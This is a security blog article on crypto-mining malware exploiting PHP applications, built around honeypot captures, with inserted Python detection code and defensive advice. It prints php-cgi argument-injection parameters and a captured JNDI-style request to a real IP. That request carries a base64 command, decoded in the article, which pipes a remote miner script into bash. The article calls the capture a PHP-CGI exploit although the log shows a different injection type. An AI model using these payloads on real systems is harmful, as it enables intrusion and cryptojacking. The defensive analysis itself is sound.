Crypto-Miners Love PHP: Understanding and Stopping Offshore Exploits

by Tanu Jain, May 15th, 2025

Too Long; Didn't Read

PHP's flexibility makes it a favorite target for crypto-mining malware via RCE exploits. This guide explains how attackers use malicious scripts, demonstrates honeypot detection techniques, and offers proactive defense tips like patching, user education, and anomaly detection to help organizations stop crypto-jacking attacks early.



The widespread use of the PHP scripting language makes it an attractive target for cybercriminals. The threat actor's advantage lies in its exploitability through remote code execution (RCE) and the ready availability of proof-of-concept (PoC) code. In this guide, I'll explain how crypto-mining malware exploits PHP applications in the wild. We will also look at some proactive measures organizations can take to protect themselves.

Understanding the Crypto-Miner Malware Threat

Cryptocurrency is a digital currency that uses cryptography to secure online transactions. It is a commodity that can be exchanged for goods and services. Unlike other forms of currency, it runs on blockchain technology, a public ledger that uses cryptographic techniques to verify fund transfers.


Crypto-jacking, the malicious form of crypto-mining, is the illegitimate use of the computing resources of end users' desktops, mobile phones, and IoT devices to mine cryptocurrency without the user noticing. Crypto-miner malware is malicious software that performs unauthorized activities such as crypto-jacking, leveraging the computing power of users' systems to mine cryptocurrency without their authorization. Threat actors deploy these malicious programs to target systems and pool the aggregated computing power to accelerate cryptocurrency mining. This significantly improves their chances of earning cryptocurrency by solving the mining puzzles without adding any cost burden to the threat actor. Crypto-miner malware often consumes CPU cycles without the end user noticing; the user simply thinks their system is running slow, while the threat actor is actually using its computing and memory resources.


Threat intelligence reports highlighted the rise of crypto-malware in recent years:


  • A threat report published by the Center for Internet Security in April 2025 discussed the top 10 malware threats in the first quarter of 2025, and crypto-malware is at No. 3 on their list.
  • As per SonicWall's white paper, crypto-jacking attacks rose to 1.06 billion in 2023, a 659% increase over 2022. Compared to 2023, encrypted malware threats doubled in 2024, targeting specific sectors including government, retail, and education. Attacks rose by 30% in North America, 182% in Europe, and 462% in Asia.


Crypto-miners readily exploit PHP applications because a successful RCE lets attackers download and execute crypto-mining scripts and take remote control of the host.


Now, let's dive deep into how crypto miners can exploit such PHP applications by creating a web application honeypot to deceive attackers.

Understanding Proactive Threat Hunting: Reactive vs. Proactive

Threat hunting is an iterative, proactive cybersecurity process. It actively searches for potential signs of a breach or traces of possible threats within an enterprise network, across all layers of the infrastructure: networks, endpoint systems, application servers, etc.


Broadly, threat hunting falls into two categories: reactive and proactive. Reactive threat hunting is the traditional approach that organizations have practiced for several years. Defensive security tools are generally reactive; they neutralize threats after the breach has happened, with the help of automated tooling and the incident response team. A key limitation of the reactive approach is its assumption that all threats are detectable. Since this is not always true, undetected attacks can result in potential business losses.


Conversely, a proactive security approach actively searches for vulnerabilities and threats in an enterprise network before cybercriminals can exploit them and cause actual damage. The benefit of a proactive approach is that it keeps the enterprise ahead of attackers. Security defenders are equipped with several proactive tools such as artificial intelligence, log analytics, deception tools, honeypots, etc. Among these, a honeypot is a proactive system or application designed as a trap to attract malicious activity that tries to infect computer networks through phishing, vulnerability exploitation, and other nefarious methods.


Let's deep dive into trapping crypto-malware using a honeypot. A real-world PHP application is hosted on a honeypot trap machine. The following steps illustrate how a remote attacker exploits PHP-CGI misconfiguration vulnerabilities to inject a PHP script into the web application.


  • Decoded Malicious Request: the attacker exploits the PHP-CGI vulnerability by injecting command-line options into the request, which makes the CGI interpreter execute attacker-supplied code. Afterwards, the attacker delivers an executable payload into the web application or the client's browser.


By setting the following php-cgi parameters, the attacker can exploit the RCE vulnerability of the PHP application:


Parameter                          Purpose
-d cgi.force_redirect=0            Bypasses PHP-CGI direct invocation protection
-d disable_functions               Re-enables all PHP functions, including dangerous ones
-d allow_url_include=1             Allows inclusion of remote files, which is common in remote code execution (RCE) attacks
-d auto_prepend_file=php://input   Executes raw PHP code from the POST body


  • Detection Metadata:

Rule Engine: OWASP CRS (Paranoia Level 1)

Matched Tags: application-multi, attack-protocol, attack-injection-php, injection-nodes

ModSecurity Score: 27.488
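To turn the parameter table above into a check a defender can run, here is an added example (not code from the article or its honeypot) that scans access-log request lines for php-cgi `-d` directives smuggled through the query string; the log lines, the 198.51.100.x addresses and the function names are constructed for the example.

```python
"""Detect PHP-CGI argument injection ('-d' option smuggling) in access-log request lines.
Added example, not code from the article. Per the CGI spec a query string with no raw
'=' is passed to the CGI program as argv (split on '+'), so '?-d+allow_url_include%3d1'
reaches php-cgi as '-d allow_url_include=1'. Log lines below are constructed."""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Directives from the article's table; any of them arriving via argv is hostile.
RISKY_DIRECTIVES = {"cgi.force_redirect", "disable_functions",
                    "allow_url_include", "auto_prepend_file"}

# Constructed Apache-style log lines (198.51.100.0/24 is a documentation range).
SAMPLE_LOGS = [
    '198.51.100.7 - - [15/May/2025:10:01:02 +0000] "POST /index.php?-d+cgi.force_redirect%3d0'
    '+-d+disable_functions%3d+-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 512',
    '198.51.100.7 - - [15/May/2025:10:01:03 +0000] "GET /index.php?page=home&id=3 HTTP/1.1" 200 1024',
    '198.51.100.9 - - [15/May/2025:10:02:00 +0000] "GET /cgi-bin/php-cgi?%2dd+allow_url_include%3d1 HTTP/1.1" 404 0',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def extract_cgi_argv(target: str) -> List[str]:
    """Return the argv php-cgi would receive for this request target ([] if none)."""
    if "?" not in target:
        return []
    query = target.split("?", 1)[1]
    if "=" in query:  # a raw '=' makes this ordinary form data, not arguments
        return []
    return [unquote(tok) for tok in query.split("+") if tok]

def find_php_cgi_injection(log_line: str) -> Optional[Dict]:
    """Return the injected php-cgi directives for one log line, or None if clean."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    argv = extract_cgi_argv(m.group("target"))
    directives: Dict[str, str] = {}
    for i, tok in enumerate(argv):
        if tok == "-d" and i + 1 < len(argv):        # "-d name=value"
            name, _, value = argv[i + 1].partition("=")
            directives[name] = value
        elif tok.startswith("-d") and len(tok) > 2:   # "-dname=value"
            name, _, value = tok[2:].partition("=")
            directives[name] = value
    if not directives:
        return None
    return {"method": m.group("method"), "directives": directives,
            "risky": sorted(set(directives) & RISKY_DIRECTIVES)}
```

Because the detector URL-decodes each token before inspecting it, the `%2dd` spelling of `-d` in the third line is caught as well as the plain form.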


Figure 1: Traffic spike observations on honeypot logs indicating the anomalous activity


The honeypot machine starts receiving traffic from a remote IP address, as depicted in Figure 1. The collected logs are parsed and modeled in an Elasticsearch database. The raw logs can be seen below:


"attack_data": "{"request": "GET /$%7Bj$%7Bk8s:k5:-ND%7Di$%7Bsd:k5:-:%7Dldap://46.8.226.196:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMjYuMTk2L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjI2LjE5Ni9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==%7D HTTP/1.1", "user-Agent": "${j${k8s:k5:-ND}i${sd:k5:-:}


Raw Logs Captured on Web Application Honeypot


Encoded Base64 Patterns

ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMjYuMTk2L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjI2LjE5Ni9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw


Decoded Base64 Patterns

When the Base64 pattern is decoded, it reveals the following command, which the remote attacker executed on the honeypot machine:


export HOME=/tmp; curl -s -L http://<remote-IP>/scripts/4thepool_miner.sh | bash -s; wget -qO- http://<remote-IP>/scripts/4thepool_miner.sh | bash -s


It can be observed that the attacker sets the HOME directory to /tmp, downloads the "4thepool_miner.sh" bash script from the remote server, and pipes it straight into bash for execution on the target system. The script is fetched over an HTTP connection with "curl" and, as a fallback, with the "wget" command from the command line.


Thereafter, the "4thepool_miner.sh" script installs, configures, and runs XMRig, a Monero miner.
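The decoding step described above, as an added example that is not part of the original article: it pulls the base64 segment out of a captured request line, decodes it leniently, and reports the download-and-execute traits (remote script URLs, piping into a shell, HOME=/tmp staging). The request and command are constructed, the 198.51.100.7 address is a documentation placeholder, and the function names are my own.

```python
"""Pull a base64-embedded shell command out of a captured request and flag
download-and-execute behaviour. Added example, not code from the article.
The honeypot request carries its payload after '/Command/Base64/'; the blob may
be URL-encoded and stripped of '=' padding. Input below is constructed."""
import base64
import re
from urllib.parse import unquote

B64_SEGMENT_RE = re.compile(r"/Command/Base64/([^\s}]+?)(?:%7D|\}|\s|$)")
URL_RE = re.compile(r"""https?://[^\s|;'"]+""")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:ba|z|da)?sh\b")

def decode_b64_lenient(blob: str) -> str:
    """Decode base64 that may be URL-encoded, URL-safe, or missing padding."""
    raw = unquote(blob).replace("-", "+").replace("_", "/")
    raw += "=" * (-len(raw) % 4)
    return base64.b64decode(raw, validate=False).decode("utf-8", errors="replace")

def analyse_request(request_line: str) -> dict:
    """Decode the embedded command and summarise its download-and-run traits."""
    m = B64_SEGMENT_RE.search(request_line)
    if not m:
        return {"command": None, "urls": [], "pipes_to_shell": False, "sets_home_tmp": False}
    cmd = decode_b64_lenient(m.group(1))
    return {
        "command": cmd,
        "urls": URL_RE.findall(cmd),                           # where the script is fetched from
        "pipes_to_shell": bool(PIPE_TO_SHELL_RE.search(cmd)),  # 'curl ... | bash' style
        "sets_home_tmp": "HOME=/tmp" in cmd,                   # same staging trick as the capture
    }

# Constructed request shaped like the honeypot capture; 198.51.100.7 is a documentation
# address standing in for the attacker's server, not the article's indicator.
CONSTRUCTED_CMD = ("export HOME=/tmp; curl -s -L http://198.51.100.7/scripts/4thepool_miner.sh | bash -s; "
                   "wget -qO- http://198.51.100.7/scripts/4thepool_miner.sh | bash -s")
CONSTRUCTED_REQUEST = ("GET /ldap://198.51.100.7:3306/TomcatBypass/Command/Base64/"
                       + base64.b64encode(CONSTRUCTED_CMD.encode()).decode().rstrip("=")
                       + "%7D HTTP/1.1")
```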

Defense Against the Crypto-Malware Cyber Threats

In recent years, the cybersecurity risks posed by crypto-malware that targets organizations and users to hijack their computing resources for wrongful purposes have evolved. Crypto-malware authors have made detection with traditional security practices extremely difficult. The best remedy against these attacks is to use Internet-connected resources more responsibly. Users on an organization's network must be regularly made aware of digital hygiene and the potential misuse of the Internet.


A few of the recommended measures include:


  • Educate employees not to click unsolicited links and to download software only from trusted sources.
  • Enforce safe Internet browsing across the organization.
  • Deploy a spam filter to block unwanted or infected emails before they reach users on the organization's network.
  • Deploy advanced anti-malware defenses and invest in cybersecurity software.
  • Fully patch operating systems, applications, services, network devices, etc.
  • Enforce regular scanning and analysis for possible malicious activity, including email attachments, messages, indicators of malicious activity, etc.
  • Adopt new technologies such as artificial intelligence and anomaly detection systems to discover unknown attack patterns.
  • Use attack simulation scenarios to test whether the security architecture is foolproof and to identify open vulnerabilities and misconfigurations in the network.
  • Adopt proactive cybersecurity measures to detect and mitigate potential attack patterns.

